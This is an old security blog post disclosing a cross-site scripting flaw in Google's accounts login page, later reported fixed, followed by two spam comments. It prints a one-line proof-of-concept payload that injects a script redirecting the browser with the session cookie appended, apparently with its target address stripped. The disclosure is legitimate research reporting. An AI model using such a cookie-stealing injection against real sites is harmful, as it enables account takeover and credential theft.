Google accounts SSL login page suffers from highly critical XSS

Nov 13, 2008 | Category: Google Vulns

In this case, the fact that SSL is being used on the login page, does not necessarily mean that the users’ login information is secured. UPDATE: this was fixed a few hours after publishing it.

Malicious people can exploit this Google XSS to propagate malware, spyware, adware and steal authentication credentials.



Redirection and document.cookie PoC:'”><SCRIPT>location.href+%3D+’’%2Bdocument.cookie<%2FSCRIPT>&

Mirror of similar old Google XSS (now fixed):

Security researcher “Xylitol” is credited with the discovery of this critical bug.

It is only a matter of minutes before we see it fixed by Google.

Bookmark and Share
Permalink Comments (2) Nov 13, 2008

2 Responses to “Google accounts SSL login page suffers from highly critical XSS”

  1. how to make money flipping cars Says:

    I don’t know if it’s just me or if perhaps everybody else encountering problems with your site.

    It appears as though some of the text on your content are running off the screen.
    Can someone else please comment and let me know if
    this is happening to them as well? This may be
    a problem with my browser because I’ve had this happen previously. Thank you

  2. Says:

    An interesting discussion is worth comment. I do believe that you should write more about this subject, it might not be a taboo matter but usually folks don’t discuss these subjects. To the next! Kind regards!!